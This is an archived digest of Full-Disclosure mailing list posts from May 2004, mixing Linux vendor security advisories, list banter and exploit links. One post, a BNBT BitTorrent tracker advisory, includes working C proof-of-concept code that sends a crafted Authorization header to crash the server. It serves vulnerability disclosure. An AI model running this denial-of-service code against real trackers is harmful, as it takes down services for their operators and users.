[Full-Disclosure] MDKSA-2004:050 - Updated kernel packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandrakelinux Security Update Advisory ___ Package name: kernel Advisory ID:MDKSA-2004:050 Date: May 21st, 2004 Affected versions: 10.0, 9.2 __ Problem Description: Brad Spender discovered an exploitable bug in the cpufreq code in the Linux 2.6 kernel (CAN-2004-0228). As well, a permissions problem existed on some SCSI drivers; a fix from Olaf Kirch is provided that changes the mode from 0777 to 0600. This update also provides a 10.0/amd64 kernel with fixes for the previous MDKSA-2004:037 advisory as well as the above-noted fixes. The provided packages are patched to fix these vulnerabilities. All users are encouraged to upgrade to these updated kernels. To update your kernel, please follow the directions located at: http://www.mandrakesoft.com/kernelupdate ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0228 __ Updated Packages: Mandrakelinux 10.0: c27bdbed859af49a0e7400b2608394e9 10.0/RPMS/kernel-2.4.25.5mdk-1-1mdk.i586.rpm 2aa96fed17d8a9a82e9603b9f1ca112b 10.0/RPMS/kernel-2.6.3.13mdk-1-1mdk.i586.rpm 32df9053e07cac55d09a0bb962323e65 10.0/RPMS/kernel-enterprise-2.4.25.5mdk-1-1mdk.i586.rpm 9e4406b3df09e62913928d13fc1638a6 10.0/RPMS/kernel-enterprise-2.6.3.13mdk-1-1mdk.i586.rpm fd4e9bedce11cd21bdcf0dc40301f2f1 10.0/RPMS/kernel-i686-up-4GB-2.4.25.5mdk-1-1mdk.i586.rpm 48ca6d4b319ff4b93c3f49242d9dab91 10.0/RPMS/kernel-i686-up-4GB-2.6.3.13mdk-1-1mdk.i586.rpm 7126bd36be90cda4292f16d43cd8df3f 10.0/RPMS/kernel-p3-smp-64GB-2.4.25.5mdk-1-1mdk.i586.rpm 1f4569fb3ee33a8ee392ec06833e85ae 10.0/RPMS/kernel-p3-smp-64GB-2.6.3.13mdk-1-1mdk.i586.rpm d396431c7e9ec430a3a67f1e844bac74 10.0/RPMS/kernel-secure-2.6.3.13mdk-1-1mdk.i586.rpm 41958f6522922947a8fee8d199454946 10.0/RPMS/kernel-smp-2.4.25.5mdk-1-1mdk.i586.rpm 44b3d21a879e488b36ec6522f2ba1f56 10.0/RPMS/kernel-smp-2.6.3.13mdk-1-1mdk.i586.rpm 462effd5b3b452749994887cba792109 10.0/RPMS/kernel-source-2.4.25-5mdk.i586.rpm 3bbac2f69ac134f15211fdbfe48adca8 10.0/RPMS/kernel-source-2.6.3-13mdk.i586.rpm f5ec5f36685134e6cc13f8e140c811a2 10.0/RPMS/kernel-source-stripped-2.6.3-13mdk.i586.rpm ca54ddc53be37e332531e9c7574b282f 10.0/SRPMS/kernel-2.4.25.5mdk-1-1mdk.src.rpm dd67df2cffe071aef5fad4691d4fcf01 10.0/SRPMS/kernel-2.6.3.13mdk-1-1mdk.src.rpm Mandrakelinux 10.0/AMD64: 30130b0a95df43ab8bbc78034abb982e amd64/10.0/RPMS/kernel-2.4.25.5mdk-1-1mdk.amd64.rpm 6de514e0a70381d91358d17b2047 amd64/10.0/RPMS/kernel-2.6.3.13mdk-1-1mdk.amd64.rpm 7d428529767fdb4f1e0586161c450252 amd64/10.0/RPMS/kernel-secure-2.6.3.13mdk-1-1mdk.amd64.rpm 20ed7696fa02ac41de642f18b4be5367 amd64/10.0/RPMS/kernel-smp-2.4.25.5mdk-1-1mdk.amd64.rpm 6820f8941edf150f0d31c7266a889604 amd64/10.0/RPMS/kernel-smp-2.6.3.13mdk-1-1mdk.amd64.rpm 2733b3696b80c6b6f14a1e5cd6aa7636 amd64/10.0/RPMS/kernel-source-2.4.25-5mdk.amd64.rpm cf3cc155e7cf92790a7271d9bfc32337 amd64/10.0/RPMS/kernel-source-2.6.3-13mdk.amd64.rpm c35af18fa10fd0293940cc0264a9fb30 amd64/10.0/RPMS/kernel-source-stripped-2.6.3-13mdk.amd64.rpm ca54ddc53be37e332531e9c7574b282f amd64/10.0/SRPMS/kernel-2.4.25.5mdk-1-1mdk.src.rpm dd67df2cffe071aef5fad4691d4fcf01 amd64/10.0/SRPMS/kernel-2.6.3.13mdk-1-1mdk.src.rpm Mandrakelinux 9.2: 83b384a70158a22b07d1675b348a756e 9.2/RPMS/kernel-2.4.22.32mdk-1-1mdk.i586.rpm d8dd19717e444638a4d86150a9b16f88 9.2/RPMS/kernel-enterprise-2.4.22.32mdk-1-1mdk.i586.rpm 231b42c760bb976d56f34f17fe524ed6 9.2/RPMS/kernel-i686-up-4GB-2.4.22.32mdk-1-1mdk.i586.rpm 2dd6754351b6d5a1a004e4ba94c6df4b 9.2/RPMS/kernel-p3-smp-64GB-2.4.22.32mdk-1-1mdk.i586.rpm 839e5c6fc4c346c187f6c6e9e847d407 9.2/RPMS/kernel-secure-2.4.22.32mdk-1-1mdk.i586.rpm 96d80a6197d075e3380aa27f64ad17d4 9.2/RPMS/kernel-smp-2.4.22.32mdk-1-1mdk.i586.rpm 299b347b46e5eafb070cfa9e75519fa5 9.2/RPMS/kernel-source-2.4.22-32mdk.i586.rpm da504294cf4d64769b8cc3855c05e306 9.2/SRPMS/kernel-2.4.22.32mdk-1-1mdk.src.rpm Mandrakelinux 9.2/AMD64: 2d16c561573580aba9a645b5db364fd0 amd64/9.2/RPMS/kernel-2.4.22.32mdk-1-1mdk.amd64.rpm 3d578c646f2b708e65e210e6f829c7c9 amd64/9.2/RPMS/kernel-secure-2.4.22.32mdk-1-1mdk.amd64.rpm ae1baf4717dad49787ac9de697eb42b7 amd64/9.2/RPMS/kernel-smp-2.4.22.32mdk-1-1mdk.amd64.rpm 1959cb64b5eafafc8afba80db2cd50ee amd64/9.2/RPMS/kernel-source-2.4.22-32mdk.amd64.rpm da504294cf4d64769b8cc3855c05e306 amd64/9.2/SRPMS/kernel-2.4.22.32mdk-1-1mdk.src.rpm ___ To upgrade automatically use MandrakeUpdate or u
Re: [Full-Disclosure] Password in the Activations Email
Is this necessarily worthy of a post to FD? I have never used that site, but I would only consider it evil if: 1) I gave it a password at signup and 2) It emailed that password back to me or 3) The password was not changable or 4) the signup procedure before the activation required enough information about you that someone intercepting the mail could cause you problems or 5) the email sent out contained a considerable amount of, and potentially harmful, information about you or connected to you (the first has happened to me only a small handful of times, i've never had the others happen) If one of those is the case, then it's terrible, but I still don't believe it's worthy of a CC to full-disclosure. However I think if it sends a temporary password out, and it asks you to change it, then that is fine in my books; it's akin to sending out an activation "code" that one must enter to activate an account. -- Kye Lewis <[EMAIL PROTECTED]> On Sat, 2004-05-22 at 13:15, Aditya, ALD [Aditya Lalit Deshmukh] wrote: > Dear sir, > > I just recieved the activation email from th stormpay.com > the activation email contains the password to the site! > > sir may i know why does the stormpay.com send the password by email > with *all* the account details to the email address in plaintext that > is not encrypted ? > > i would like to know if during the transmission of the email if some > one got hold of the mail and misused the account who would be > responible for it ? > > > hoping the u would quickly. > -aditya > > Delivered using the Free Personal Edition of Mailtraq > (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [inbox] [Full-Disclosure] Remember the subject about posting the exploit?
Wow, such deep insight. HELLLO, almost all the "big" worms had vulnerabilities published, in some cases years before the worm was released. There is a solution APPLY THE DARNED PATCHES Ex > -Original Message- > From: RandallM [mailto:[EMAIL PROTECTED] > Sent: Friday, May 21, 2004 7:11 PM > To: [EMAIL PROTECTED] > Subject: [inbox] [Full-Disclosure] Remember the subject about posting > the exploit? > > > Well, concerning the German Teenager who is responsible for releasing > sasser, Mitnick states: > > > > "He was no great technical expert. There was a published vulnerability and > he took his worm and used his exploit code to be able to > propagate it in the > many systems that Sasser touched." > > > > http://www.zone-h.com/en/news/read/id=4245/ > > > > Just my point justified. A more protective measure must surely exist? > > > > Like I said before I play counter strike. The kids 12-18 years > old on there > know c+ like the back of their hand and brag about which university there > bots got into that day and the number of bots they own. > > > > thank you > > Randall M > > > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Password in the Activations Email
Dear sir, I just recieved the activation email from th stormpay.com the activation email contains the password to the site! sir may i know why does the stormpay.com send the password by email with *all* the account details to the email address in plaintext that is not encrypted ? i would like to know if during the transmission of the email if some one got hold of the mail and misused the account who would be responible for it ? hoping the u would quickly. -aditya Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
[Full-Disclosure] BNBT BitTorrent Tracker Denial Of Service
See the following link, or the attached advisory.
http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt
badpack3t
www.security-protocols.com
SP Research Labs Advisory x12
-
BNBT BitTorrent Tracker Denial Of Service
-
Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions
Vendors:
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/
Date Released - 5.21.2004
Product Description from the vendor:
BNBT was written by Trevor Hogan. BNBT is a complete port of the original Python
BitTorrent tracker to
C++ for speed and efficiency. BNBT also offers many additional features beyond the
original Python
BitTorrent tracker, plus it's easy to use and customizable. BNBT is covered under the
GNU Lesser
General Public License (LGPL).
Details:
A specifically crafted HTTP GET request which contains 'Authorization: Basic A==' will
cause the BNBT
server to crash. It may be possible to execute arbitrary code. Previous versions are
also affected by
this vulnerability. The bug is located in util.cpp in the Util_DecodeHTTPAuth
function.
Exploit:
Attached to this advisory is very basic PoC code which only causes the BNBT server to
crash.
--
Tested on:
WindowsXP SP1
peace out,
--
badpack3t
www.security-protocols.com
--
//
PoC to crash the server
//
/* BNBT BitTorrent Tracker Denial Of Service
Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions
Vendors:
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/
The bug is located in util.cpp in the Util_DecodeHTTPAuth function.
Coded and Discovered by:
badpack3t <[EMAIL PROTECTED]>
.:sp research labs:.
www.security-protocols.com
5.21.2004
This PoC will only DoS the server to verify if it is vulnerable.
*/
#include
#include
#pragma comment(lib, "ws2_32.lib")
char exploit[] =
"GET / HTTP/1.0\r\n"
"Authorization: Basic A==\r\n\r\n";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET mysocket;
if (argc < 2)
{
printf("BNBT BitTorrent Tracker DoS by badpack3t\r\n <[EMAIL
PROTECTED]>\r\n\r\n", argv[0]);
printf("Usage:\r\n %s [targetport] (default is
6969)\r\n\r\n", argv[0]);
printf("www.security-protocols.com\r\n\r\n", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 6969;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error!\r\n");
exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.\n");
exit(1);
}
printf("Connected!...\n");
printf("Sending Payload...\n");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payload\r\n");
closesocket(mysocket);
exit(1);
}
printf("Payload has been sent! Check if the webserver is dead.\r\n");
closesocket(mysocket);
WSACleanup();
return 0;
}
[Full-Disclosure] Remember the subject about posting the exploit?
Well, concerning the German Teenager who is responsible for releasing sasser, Mitnick states: "He was no great technical expert. There was a published vulnerability and he took his worm and used his exploit code to be able to propagate it in the many systems that Sasser touched." http://www.zone-h.com/en/news/read/id=4245/ Just my point justified. A more protective measure must surely exist? Like I said before I play counter strike. The kids 12-18 years old on there know c+ like the back of their hand and brag about which university there bots got into that day and the number of bots they own. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200405-16 ] Multiple XSS Vulnerabilities in SquirrelMail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200405-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Multiple XSS Vulnerabilities in SquirrelMail Date: May 21, 2004 Bugs: #49675 ID: 200405-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis SquirrelMail is subject to several XSS and one SQL injection vulnerability. Background == SquirrelMail is a webmail package written in PHP. It supports IMAP and SMTP, and can optionally be installed with SQL support. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 net-mail/squirrelmail <= 1.4.2 >= 1.4.3_rc1 Description === Several unspecified cross-site scripting (XSS) vulnerabilities and a well hidden SQL injection vulnerability were found. An XSS attack allows an attacker to insert malicious code into a web-based application. SquirrelMail does not check for code when parsing variables received via the URL query string. Impact == One of the XSS vulnerabilities could be exploited by an attacker to steal cookie-based authentication credentials from the user's browser. The SQL injection issue could potentially be used by an attacker to run arbitrary SQL commands inside the SquirrelMail database with privileges of the SquirrelMail database user. Workaround == There is no known workaround at this time. All users are advised to upgrade to version 1.4.3_rc1 or higher of SquirrelMail. Resolution == All SquirrelMail users should upgrade to the latest stable version: # emerge sync # emerge -pv ">=net-mail/squirrelmail-1.4.3_rc1" # emerge ">=net-mail/squirrelmail-1.4.3_rc1" References == [ 1 ] SquirrelMail 1.4.3_rc1 release annoucement http://sourceforge.net/mailarchive/forum.php?thread_id=4199060&forum_id=1988 [ 2 ] Bugtraq security annoucement http://www.securityfocus.com/bid/10246/ [ 3 ] CERT description of XSS http://www.cert.org/advisories/CA-2000-02.html Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200405-16.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.3 (Darwin) iD8DBQFArkYbnt0v0zAqOHYRAsbCAKCgFyTi3benON9CIPi1Z/Zs85KXFgCeKOeF SbrQqZQoiK2N2QPn8FuWUHw= =HZpB -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200405-17 ] Multiple vulnerabilities in metamail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200405-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Multiple vulnerabilities in metamail Date: May 21, 2004 Bugs: #42133 ID: 200405-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Several format string bugs and buffer overflows were discovered in metamail, potentially allowing execution of arbitrary code remotely. Background == Metamail is a program that decodes MIME encoded mail. It is therefore often automatically called when an email is received or read. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 net-mail/metamail < 2.7.45.3 >= 2.7.45.3 Description === Ulf Harnhammar found two format string bugs and two buffer overflow bugs in Metamail. Impact == A remote attacker could send a malicious email message and execute arbitrary code with the rights of the process calling the Metamail program. Workaround == There is no known workaround at this time. Resolution == All users of Metamail should upgrade to the latest stable version: # emerge sync # emerge -pv ">=net-mail/metamail-2.7.45.3" # emerge ">=net-mail/metamail-2.7.45.3" References == [ 1 ] CAN-2004-0104 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0104 [ 2 ] CAN-2004-0105 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0105 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200405-17.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFArltcvcL1obalX08RArLOAJ9YFERhJfcJrzZthA7HVjbLmyxazwCgqghl l/eXbhtKh4BVtCGmVPSD2zs= =GdJa -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] CVS Entry Line Overflow EXPLOIT ...
CVS Remote Entry Line Heap Overflow Root Exploit (Solaris) http://www.k-otik.com/exploits/05212004.CVS_Solaris.c.php CVS Remote Entry Line Heap Overflow Root Exploit (Linux/FreeBSD) http://www.k-otik.com/exploits/05212004.CVS_Linux.c.php ... Do you Yahoo!?Yahoo! Domains - Claim yours for only $14.70/year
RE: [Full-Disclosure] C# Web application security scanner
Ron Dufresne wrote> >I'll bet he/she still drives the usenet folks buggy seeking folks to >complete his homework as well. And also older than most of the teachers at it's school!. On Fri, 21 May 2004, Sean Crawford wrote: > Ron Dufresne wrote> > > >the harry potter and lord of the rings movies must have blinded many here > >to trolls and flamebait. > > Surely any sane person would see right through this!. > Although the offer of doing his work for him with no pay is tempting > :-) > > >On Thu, 20 May 2004 [EMAIL PROTECTED] wrote: > > > I want to start my own web application security company using open source > code so I don't have to pay for it. That way I can get everyone else to do > my work for me and make lots of money ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] C# Web application security scanner
As soon as I saw the C# I knew it was a troll.. On Fri, 21 May 2004, Mister Coffee wrote: > > Don't feed the trolls... > > > On Thu, May 20, 2004 at 03:24:01PM -0400, [EMAIL PROTECTED] wrote: > > I want to start my own web application security company using open source code so > > I don't have to pay for it. That way I can get everyone else to do my work for me > > and make lots of money > > > > -Original Message- > > From: Martin Mkrtchian <[EMAIL PROTECTED]> > > Sent: May 20, 2004 1:05 PM > > To: [EMAIL PROTECTED] > > Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], > > [EMAIL PROTECTED], [EMAIL PROTECTED] > > Subject: Re: [Full-Disclosure] C# Web application security scanner > > > > Why would u want to start your company with someone elses code? Web > > application scanner? Are you refering to something like APPSCAN type > > thing or are you refering to VA Scanner type thing like Nessus. If you > > are seeking for something like Nessus, then obviously the code is out > > there, hire someone to customize it to your needs. > > > > > > On Thu, 20 May 2004 10:08:26 +0530, Aditya, ALD [Aditya Lalit > > Deshmukh] <[EMAIL PROTECTED]> wrote: > > > > > > > > > > > > > [EMAIL PROTECTED] wrote: > > > > > > > > >Can anyone give me the source code to a good web application > > > > security scanner written > > > > >in C# so I can start my own company? Drop me an email with a > > > > link or code off of > > > > >the list please. > > > > > > since u are starting your own company, i would be very happy to write one for u > > > and share it with the list provided you pay me for doing this, wouldent u agree ? > > > > > > > > > Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) > > > > > > ___ > > > Full-Disclosure - We believe in it. > > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] C# Web application security scanner
I'll bet he/she still drives the usenet folks buggy seeking folks to complete his homework as well. Thanks, Ron DuFresne On Fri, 21 May 2004, Sean Crawford wrote: > Ron Dufresne wrote> > > >the harry potter and lord of the rings movies must have blinded many here > >to trolls and flamebait. > > Surely any sane person would see right through this!. > Although the offer of doing his work for him with no pay is tempting > :-) > > >On Thu, 20 May 2004 [EMAIL PROTECTED] wrote: > > > I want to start my own web application security company using open source > code so I don't have to pay for it. That way I can get everyone else to do > my work for me and make lots of money > > > > -Original Message- > > From: Martin Mkrtchian <[EMAIL PROTECTED]> > > Sent: May 20, 2004 1:05 PM > > To: [EMAIL PROTECTED] > > Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], > > [EMAIL PROTECTED], [EMAIL PROTECTED] > > Subject: Re: [Full-Disclosure] C# Web application security scanner > > > > Why would u want to start your company with someone elses code? Web > > application scanner? Are you refering to something like APPSCAN type > > thing or are you refering to VA Scanner type thing like Nessus. If you > > are seeking for something like Nessus, then obviously the code is out > > there, hire someone to customize it to your needs. > > > > > > On Thu, 20 May 2004 10:08:26 +0530, Aditya, ALD [Aditya Lalit > > Deshmukh] <[EMAIL PROTECTED]> wrote: > > > > > > > > > > > > > [EMAIL PROTECTED] wrote: > > > > > > > > >Can anyone give me the source code to a good web application > > > > security scanner written > > > > >in C# so I can start my own company? Drop me an email with a > > > > link or code off of > > > > >the list please. > > > > > > since u are starting your own company, i would be very happy to write > one for u and share it with the list provided you pay me for doing this, > wouldent u agree ? > > > > > > > > > Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) > > > > > > ___ > > > Full-Disclosure - We believe in it. > > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > ~~ > "Cutting the space budget really restores my faith in humanity. It > eliminates dreams, goals, and ideals and lets us get straight to the > business of hate, debauchery, and self-annihilation." -- Johnny Hart > ***testing, only testing, and damn good at it too!*** > > OK, so you're a Ph.D. Just don't touch anything. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > Information from NOD32 > This message was checked by NOD32 Antivirus System for Linux Mail Server. > part000.txt - is OK > http://www.nod32.com > > __ NOD32 1.768 (20040520) Information __ > > This message was checked by NOD32 antivirus system. > http://www.nod32.com > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [OpenPKG-SA-2004.025] OpenPKG Security Advisory (rsync)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security.html http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2004.025 21-May-2004 Package: rsync Vulnerability: filesystem intrusion OpenPKG Specific:no Affected Releases: Affected Packages: Corrected Packages: OpenPKG CURRENT <= rsync-2.6.0-20040324 >= rsync-2.6.1-20040428 OpenPKG 2.0 <= rsync-2.6.0-2.0.0>= rsync-2.6.0-2.0.1 OpenPKG 1.3 <= rsync-2.5.6-1.3.1>= rsync-2.5.6-1.3.2 Dependent Packages: none Description: According to a Rsync [0] security advisory [1], versions before 2.6.1 do not properly sanitize paths when running as a read/write daemon without using chroot(2). This allows remote attackers to write files outside of the module's path. The OpenPKG default is to run a read-only daemon using chroot(2). The Common Vulnerabilities and Exposures (CVE) project assigned the id CAN-2004-0426 [2] to the problem. Please check whether you are affected by running "/bin/rpm -q rsync". If you have the "rsync" package installed and its version is affected (see above), we recommend that you immediately upgrade it (see Solution) [3][4]. Solution: Select the updated source RPM appropriate for your OpenPKG release [5][6], fetch it from the OpenPKG FTP service [7][8] or a mirror location, verify its integrity [9], build a corresponding binary RPM from it [3] and update your OpenPKG installation by applying the binary RPM [4]. For the most recent release OpenPKG 2.0, perform the following operations to permanently fix the security problem (for other releases adjust accordingly). $ ftp ftp.openpkg.org ftp> bin ftp> cd release/2.0/UPD ftp> get rsync-2.6.0-2.0.1.src.rpm ftp> bye $ /bin/openpkg rpm -v --checksig rsync-2.6.0-2.0.1.src.rpm $ /bin/openpkg rpm --rebuild rsync-2.6.0-2.0.1.src.rpm $ su - # /bin/openpkg rpm -Fvh /RPM/PKG/rsync-2.6.0-2.0.1.*.rpm References: [0] http://rsync.samba.org/ [1] http://rsync.samba.org/index.html#security_apr04 [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0426 [3] http://www.openpkg.org/tutorial.html#regular-source [4] http://www.openpkg.org/tutorial.html#regular-binary [5] ftp://ftp.openpkg.org/release/1.3/UPD/rsync-2.5.6-1.3.2.src.rpm [6] ftp://ftp.openpkg.org/release/2.0/UPD/rsync-2.6.0-2.0.1.src.rpm [7] ftp://ftp.openpkg.org/release/1.3/UPD/ [8] ftp://ftp.openpkg.org/release/2.0/UPD/ [9] http://www.openpkg.org/security.html#signature For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/ for details on how to verify the integrity of this advisory. -BEGIN PGP SIGNATURE- Comment: OpenPKG <[EMAIL PROTECTED]> iD8DBQFArivtgHWT4GPEy58RAnEFAJ44zlK748Yrc6UT/1a1iIESRxJJ+wCePQFs NmRw90v1Pry2EhTfrDO2D+U= =zbta -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] C# Web application security scanner
Don't feed the trolls... On Thu, May 20, 2004 at 03:24:01PM -0400, [EMAIL PROTECTED] wrote: > I want to start my own web application security company using open source code so I > don't have to pay for it. That way I can get everyone else to do my work for me and > make lots of money > > -Original Message- > From: Martin Mkrtchian <[EMAIL PROTECTED]> > Sent: May 20, 2004 1:05 PM > To: [EMAIL PROTECTED] > Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], > [EMAIL PROTECTED], [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] C# Web application security scanner > > Why would u want to start your company with someone elses code? Web > application scanner? Are you refering to something like APPSCAN type > thing or are you refering to VA Scanner type thing like Nessus. If you > are seeking for something like Nessus, then obviously the code is out > there, hire someone to customize it to your needs. > > > On Thu, 20 May 2004 10:08:26 +0530, Aditya, ALD [Aditya Lalit > Deshmukh] <[EMAIL PROTECTED]> wrote: > > > > > > > > > [EMAIL PROTECTED] wrote: > > > > > > >Can anyone give me the source code to a good web application > > > security scanner written > > > >in C# so I can start my own company? Drop me an email with a > > > link or code off of > > > >the list please. > > > > since u are starting your own company, i would be very happy to write one for u > > and share it with the list provided you pay me for doing this, wouldent u agree ? > > > > > > Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Web interface for full-disclosure and others
Actually, you can use following to get feed for full-disclosure and bugtraq on you website, http://www.securitytrap.com/seclist.js";> http://www.securitytrap.com/list_display.js";> var full_max = '10'; var bugtraq_max = '10'; var securitytrap_max = '4'; listDisplay(); tune the value for the items displayed. -vertex On Fri, May 21, 2004 at 09:27:54AM -0400, William Warren wrote: > wow that's nice..any chance you setting up an rss feed of your site? > > vertex wrote: > > >Hello, > > > >I am building a web interface which will help to monitoring the > >mailing list easier. The interface get the RSS feed from > >seclist.org and other web site and convert them into a single > >web interface. Now the web interface include full-disclosure, > >bugtraq, Internet Storm Center, OSVDB, and others. > > > >The web interface also include a Drupal based forum. > > > >Check it out at http://www.securitytrap.com/mail.html > > > >Any suggestoin is welcome, > > > >-vertex > > -- > My "Foundation" verse: > Isa 54:17 No weapon that is formed against thee shall prosper; and > every tongue that shall rise against thee in judgment thou shalt > condemn. This is the heritage of the servants of the LORD, and their > righteousness is of me, saith the LORD. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html -- http://www.securitytrap.com Security by full disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Stupid Phishing Tricks
